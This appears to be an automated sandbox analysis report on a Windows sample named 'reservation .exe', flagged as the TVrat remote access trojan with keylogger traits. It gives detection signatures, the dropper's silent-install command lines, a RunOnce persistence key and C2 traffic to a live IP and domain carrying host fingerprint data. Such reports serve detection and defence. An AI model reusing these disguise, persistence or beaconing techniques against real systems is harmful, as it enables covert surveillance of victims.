Windows Analysis Report
reservation .exe

Overview

General Information

Sample name: reservation .exe
Analysis ID: 1558751
MD5: ded33758f9470a6ee7ccaba58301f651
SHA1: b4b43213b8ba2e83de9344ecb038811c1636d864
SHA256: 165002986f77081f5cf1a411a8efa39219b359fa2245b563140c9d09e8ed6765
Tags: exe, user-JAMESWT_MHT

Detection

TVrat
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Sigma detected: Suspicious Double Extension File Execution
Yara detected TVrat
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to detect virtualization through RDTSC time measurements
Uses an obfuscated file name to hide its real file extension (a lot of spaces)
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic

Classification

  • System is w10x64
  • reservation .exe (PID: 1988 cmdline: "C:\Users\user\Desktop\reservation .exe" MD5: DED33758F9470A6EE7CCABA58301F651)
    • reservation .tmp (PID: 5756 cmdline: "C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp" /SL5="$10464,7120736,816128,C:\Users\user\Desktop\reservation .exe" MD5: D3E870E4BBE9AAF106AB9B0510956A89)
      • reservation .exe (PID: 2412 cmdline: "C:\Users\user\Desktop\reservation .exe" /verysilent /password=84t66giu MD5: DED33758F9470A6EE7CCABA58301F651)
        • reservation .tmp (PID: 1372 cmdline: "C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp" /SL5="$2046A,7120736,816128,C:\Users\user\Desktop\reservation .exe" /verysilent /password=84t66giu MD5: D3E870E4BBE9AAF106AB9B0510956A89)
          • cmd.exe (PID: 1272 cmdline: "C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\qilq\g3ll5lm.bat"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 2300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • xcopy.exe (PID: 4676 cmdline: xcopy /Y /I /S "C:\Users\user\AppData\Local\Temp\qilq\*" "C:\Users\user\AppData\Roaming\fat\" MD5: 7E9B7CE496D09F70C072930940F9F02C)
            • ast.exe (PID: 3380 cmdline: "C:\Users\user\AppData\Roaming\fat\ast.exe" MD5: 8002D9E5851728EB024B398CF19DE390)
  • ast.exe (PID: 6856 cmdline: "C:\Users\user\AppData\Roaming\fat\ast.exe" MD5: 8002D9E5851728EB024B398CF19DE390)
  • ast.exe (PID: 1964 cmdline: "C:\Users\user\AppData\Roaming\fat\ast.exe" MD5: 8002D9E5851728EB024B398CF19DE390)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\fat\ast.exe | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
C:\Users\user\AppData\Roaming\fat\ast.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
C:\Users\user\AppData\Roaming\fat\ast.exe | JoeSecurity_TVrat | Yara detected TVrat | Joe Security |
C:\Users\user\AppData\Local\Temp\qilq\is-5KIJJ.tmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
C:\Users\user\AppData\Local\Temp\qilq\is-5KIJJ.tmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
Source | Rule | Description | Author | Strings
0000000A.00000000.2727527393.0000000000401000.00000020.00000001.01000000.0000000C.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
0000000A.00000000.2727527393.0000000000401000.00000020.00000001.01000000.0000000C.sdmp | JoeSecurity_TVrat | Yara detected TVrat | Joe Security |
Process Memory Space: ast.exe PID: 3380 | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
Process Memory Space: ast.exe PID: 3380 | JoeSecurity_TVrat | Yara detected TVrat | Joe Security |
Source | Rule | Description | Author | Strings
10.0.ast.exe.400000.0.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
10.0.ast.exe.400000.0.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
10.0.ast.exe.400000.0.unpack | JoeSecurity_TVrat | Yara detected TVrat | Joe Security |

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Users\user\Desktop\reservation .exe", CommandLine: "C:\Users\user\Desktop\reservation .exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\reservation .exe, NewProcessName: C:\Users\user\Desktop\reservation .exe, OriginalFileName: C:\Users\user\Desktop\reservation .exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Users\user\Desktop\reservation .exe", ProcessId: 1988, ProcessName: reservation .exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\user\AppData\Roaming\fat\ast.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\fat\ast.exe, ProcessId: 3380, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\fat
No Suricata rule has matched

AV Detection

Source: Yara match; File source: 10.0.ast.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000A.00000000.2727527393.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: ast.exe PID: 3380, type: MEMORYSTR
Source: Yara match; File source: C:\Users\user\AppData\Roaming\fat\ast.exe, type: DROPPED
Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\qilq\is-5KIJJ.tmp, type: DROPPED
Source: C:\Users\user\AppData\Roaming\fat\ast.exe; Code function: 10_2_6B6C8010 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,10_2_6B6C8010
Source: C:\Users\user\AppData\Roaming\fat\ast.exe; Code function: 10_2_6B6E20A0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,10_2_6B6E20A0
Source: ast.exe, 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp; Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_9d90cbc3-e
Source: reservation .exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:49979 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:49982 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:49985 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:49988 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:49991 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:49994 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:49997 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50000 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50003 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50006 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50009 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50012 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50015 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50021 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50024 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50027 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50030 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50033 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50036 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50039 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50042 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50045 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50048 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50051 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50054 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50057 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50060 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50063 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50066 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50069 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50072 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50078 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50081 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50084 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50087 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50090 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50093 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50096 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50099 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50102 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50105 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50108 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50111 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50114 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50117 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50120 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50123 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50126 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50129 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50132 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50135 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50141 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50144 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50147 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50150 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50153 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50156 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50159 version: TLS 1.2
Source: reservation .exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Source: Binary string: vcruntime140.i386.pdb source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000002.2726589967.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3337890732.000000006E0D1000.00000020.00000001.01000000.00000015.sdmp
                          Source: Binary string: vcruntime140.i386.pdbGCTL source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000002.2726589967.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3337890732.000000006E0D1000.00000020.00000001.01000000.00000015.sdmp
                          Source: Binary string: D:\ProjectsVS2015\OpenSSL\openssl-1.1.1l\libcrypto-1_1.pdb source: xcopy.exe, 00000008.00000003.2456715536.00000000030E6000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3329265043.000000006BC70000.00000002.00000001.01000000.00000014.sdmp, is-RFQHO.tmp.4.dr
                          Source: Binary string: vcomp140.i386.pdbGCTL source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\CFILES\Projects\WinSSL\openssl-1.1.0g\libcrypto-1_1.pdb source: xcopy.exe, 00000008.00000003.2457697380.000000000310F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstClient.pdbe source: xcopy.exe, 00000008.00000003.2454251899.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3337086726.000000006C923000.00000002.00000001.01000000.0000000F.sdmp, is-8MMT6.tmp.4.dr
                          Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2u-x32\out32dll\ssleay32.pdb source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2726150337.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2u-x32\out32dll\libeay32.pdb source: xcopy.exe, 00000008.00000003.2458749417.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2u-x32\out32dll\ssleay32.pdb@W source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2726150337.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstRct.pdb source: xcopy.exe, 00000008.00000003.2455429869.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3331797852.000000006C0DF000.00000002.00000001.01000000.00000011.sdmp
                          Source: Binary string: D:\Projects\Delphi\_Assistant\10_FSTEK_02\00_Bin\Hatls.pdb source: xcopy.exe, 00000008.00000003.2455975979.0000000003106000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3334659818.000000006C392000.00000002.00000001.01000000.00000010.sdmp
                          Source: Binary string: D:\ProjectsVS2015\OpenSSL\openssl-1.1.1l\libssl-1_1.pdb@@ source: xcopy.exe, 00000008.00000003.2459594021.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3336200986.000000006C701000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: vcomp140.i386.pdb source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\Projects\Delphi\_Assistant\10_FSTEK_02\00_Bin\Hatls.pdbf source: xcopy.exe, 00000008.00000003.2455975979.0000000003106000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3334659818.000000006C392000.00000002.00000001.01000000.00000010.sdmp
                          Source: Binary string: D:\ProjectsVS2015\OpenSSL\openssl-1.1.1l\libssl-1_1.pdb source: xcopy.exe, 00000008.00000003.2459594021.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3336200986.000000006C701000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: ast.exe, 0000000A.00000002.3329265043.000000006BC07000.00000002.00000001.01000000.00000014.sdmp, is-RFQHO.tmp.4.dr
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstClient.pdb source: xcopy.exe, 00000008.00000003.2454251899.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3337086726.000000006C923000.00000002.00000001.01000000.0000000F.sdmp, is-8MMT6.tmp.4.dr
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstRct.pdbM6 source: xcopy.exe, 00000008.00000003.2455429869.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3331797852.000000006C0DF000.00000002.00000001.01000000.00000011.sdmp
                          Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASMOpenSSL 1.1.1l 24 Aug 2021built on: Tue Sep 7 07:24:19 2021 UTCplatform: VC-WIN32OPENSSLDIR: "C:\Program Files (x86)\Common Files\SSL"ENGINESDIR: "C:\Program Files (x86)\OpenSSL\lib\engines-1_1"not availabledes(long) source: ast.exe, 0000000A.00000002.3329265043.000000006BC07000.00000002.00000001.01000000.00000014.sdmp, is-RFQHO.tmp.4.dr
Source: C:\Users\user\AppData\Roaming\fat\ast.exe; Code function: 11_2_070641D8 lstrcat,FindFirstFileA,lstrcat,FindNextFileA,FindClose,11_2_070641D8
Source: global traffic; TCP traffic: 192.168.2.5:50018 -> 212.193.169.65:44335
Source: global traffic; HTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1 Host: id.xn--80akicokc0aablc.xn--p1ai:443 Content-Length: 269
Source: global traffic; HTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1 Host: id.xn--80akicokc0aablc.xn--p1ai:443 Content-Length: 269 Data: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.19045) x64
Source: Joe Sandbox View | IP Address: 212.193.169.65 212.193.169.65
Source: Joe Sandbox View | JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Code function: 10_2_6B6F09F0 recv,send,WSAGetLastError,10_2_6B6F09F0
Source: global traffic | DNS traffic detected: DNS query: id.xn--80akicokc0aablc.xn--p1ai
Source: unknown | HTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1 | Host: id.xn--80akicokc0aablc.xn--p1ai:443 | Content-Length: 269
Source: reservation .exe, 00000000.00000003.2036017646.0000000002640000.00000004.00001000.00020000.00000000.sdmp, reservation .tmp, 00000002.00000003.2041310250.00000000034D0000.00000004.00001000.00020000.00000000.sdmp, reservation .tmp, 00000002.00000003.2043757118.0000000000BC0000.00000004.00001000.00020000.00000000.sdmp, reservation .tmp, 00000002.00000003.2043757118.0000000000C25000.00000004.00001000.00020000.00000000.sdmp, reservation .exe, 00000003.00000003.2459283655.0000000002245000.00000004.00001000.00020000.00000000.sdmp, reservation .tmp, 00000004.00000003.2454431247.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, reservation .tmp, 00000004.00000003.2454431247.000000000372F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1/innosetup/index.htm
Source: reservation .exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: reservation .exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: reservation .exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: xcopy.exe, 00000008.00000003.2451867441.0000000003108000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454251899.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454713118.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2459594021.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455429869.0000000002EBF000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2456715536.000000000313E000.00000004.00000020.00020000.00000000.sdmp, is-RFQHO.tmp.4.dr, is-8MMT6.tmp.4.dr | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455548445.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2457697380.000000000315E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455975979.00000000030FC000.00000004.00000020.00020000.00000000.sdmp, aw_sas32.dll.8.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455548445.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2457697380.000000000315E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455975979.00000000030FC000.00000004.00000020.00020000.00000000.sdmp, aw_sas32.dll.8.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: reservation .exe | String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: reservation .exe | String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: ast.exe, 0000000A.00000003.2895606355.0000000005BD1000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3265017891.0000000005C86000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3299122357.0000000005C8B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/gsgccr6alphasslca2023.crl0G
Source: ast.exe, 0000000A.00000003.2895606355.0000000005BD1000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3183555638.0000000005BEC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/root-r6.crl0
Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2726150337.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2458749417.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.sectigo.com/COMODOTimeStampingCA_2.crl0r
Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2451867441.0000000003108000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454251899.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2726150337.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454713118.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2459594021.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2458749417.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455429869.0000000002EBF000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2456715536.000000000313E000.00000004.00000020.00020000.00000000.sdmp, is-RFQHO.tmp.4.dr, is-8MMT6.tmp.4.dr | String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: xcopy.exe, 00000008.00000003.2451867441.0000000003108000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454251899.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454713118.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2459594021.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455429869.0000000002EBF000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2456715536.000000000313E000.00000004.00000020.00020000.00000000.sdmp, is-RFQHO.tmp.4.dr, is-8MMT6.tmp.4.dr | String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: reservation .exe | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: reservation .exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: reservation .exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2726150337.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2458749417.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0#
